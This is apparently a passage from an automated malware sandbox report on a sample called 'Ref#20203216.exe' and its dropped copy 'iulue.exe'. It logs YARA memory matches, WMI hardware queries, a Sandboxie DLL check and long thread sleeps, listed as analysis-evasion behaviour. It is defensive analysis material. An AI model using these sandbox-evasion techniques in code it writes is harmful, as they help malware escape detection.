                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#20203216.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeMemory allocated: 50F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeMemory allocated: 4C80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeMemory allocated: 29D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWindow / User API: threadDelayed 4809Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWindow / User API: threadDelayed 956Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWindow / User API: threadDelayed 4896Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWindow / User API: threadDelayed 2359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWindow / User API: threadDelayed 2122Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWindow / User API: threadDelayed 3258Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWindow / User API: threadDelayed 5744Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWindow / User API: threadDelayed 1738Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5856Thread sleep count: 4809 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5856Thread sleep count: 956 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -99000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -98890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -98781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -98646s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -98531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -98421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -98250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -98138s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97961s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97842s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460Thread sleep time: -97078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 3428Thread sleep count: 4896 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 3428Thread sleep count: 2359 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99124s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -99015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98749s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98528s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -98063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96922s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -96120s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -95854s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5660Thread sleep count: 2122 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5660Thread sleep count: 3258 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99641s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99516s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99297s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99181s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -99062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98950s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98842s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98729s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98391s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98266s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -98027s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97813s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97688s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97563s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97438s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97188s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 4924Thread sleep time: -97077s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5820Thread sleep count: 5744 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 5820Thread sleep count: 1738 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99451s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99342s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -99087s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98805s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98468s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98359s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98140s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -98031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97921s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97703s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97593s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97484s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97374s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97265s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -97046s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96828s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96716s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96584s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96330s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -96102s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -95984s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -95874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -95765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exe TID: 2208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99328Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99219Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99109Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 99000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98890Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98781Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeThread delayed: delay time: 98646Jump to behavior
